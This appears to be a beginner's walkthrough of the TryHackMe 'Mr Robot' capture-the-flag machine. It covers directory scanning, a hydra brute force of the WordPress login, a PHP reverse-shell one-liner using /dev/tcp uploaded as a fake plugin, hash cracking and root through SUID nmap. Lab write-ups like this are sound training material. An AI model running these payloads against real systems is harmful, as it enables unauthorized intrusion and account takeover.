π€{THM}Mr Robot
Last updated
Last updated
Based on the Mr. Robot show, can you root this box?
Can you root this Mr. Robot styled machine? This is a virtual machine meant for beginners/intermediate users. There are 3 hidden keys located on the machine, can you find them?
Credit to Leon Johnson for creating this machine. This machine is used here with the explicit permission of the creator <3
I use normal nmap and gobuster (slooooww). But i see the connection so bad. So i decide to put in my environment so that connectivity issue not so bad.
echo "THM_machine mrrobot.thm" > /etc/hosts
Let proceed with our directory scanning.
gobuster dir -u http://<THM_MAHCINE> - w <pathtowordlist>
Yeahhh,, we found some good information. This machine run wordpress and it have robots there. Let open and see what robots have..
It show 2 directory. One of it is our first flag. We try to navigate to fsocity.dic it auto download some file. The file contain some word.
At glance I do assume this is list of password and username.
Since this is wordpress. Let try to login by going /wp-login/.
Let try some default credential admin:admin, admin:password. We notice it appear to said that username is incorrect. That hint. Before this, on downloaded file, we notice some name, I do by putting some valuable name such robot, Robot and Elliot. Boom, we got username.
For password, i use hydra to bruteforce it.
hydra -l Elliot -P fsocity.dic <machine> http-post-form "/wp-login.php:log=^USER^&pwd=^PWD^:The password you entered for the username"
Hydra successfully found Elliotβs valid password ER28-0652.
alternative
wpscan --url THM_MACHINE --wp-content-dir wp-admin --usernames elliot --passwords fsocity-sorted.dic
Next we proceed login to word press with credential we got.
As we can see, it can be exploit with 2 ways.
By using 404 template
Uploading fake plugin (i use this)
To do so, let proceed to plugin and add new.
Next we upload our reverse shell.
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/IP_MACHINE/PORT 0>&1'"); ?>
before upload our shell, make sure to save it to zip file since it only accept .zip file.
After that, open listening port
nc -lnvp port
As we know, we have to start from home. We now the user is robot and got flag inside. Before that, make stable connection.
But we cannot read this file due to permission denied. So proceed to other file we found in home.
we can see in format username:password (hash)
Let decrypt it.
Find hash - echo "puthash" | hash-identifier
crack using hashcat or crackstation(online)
We got the crack pass. Let try use with the username robot.
Now we can see our flag.
Let move to be root. Unfortunately, we cannot run sudo. Let use other way to find any vulnerable in this machine.
find / -perm -u=s -type f 2>/dev/null
When we cannot run sudo, i will use this method.
It shown this machine vulnerable with nmap. Let find how to escalate it. (GTFObin)
nmap --interactive and !sh
we in as root as easy as that.
Now let find our flag. And that is for Mr ROBOT.
Always update nmap version since the latest version don't allow interactive. Other than, make sure to configurate on sudo or administrator use.
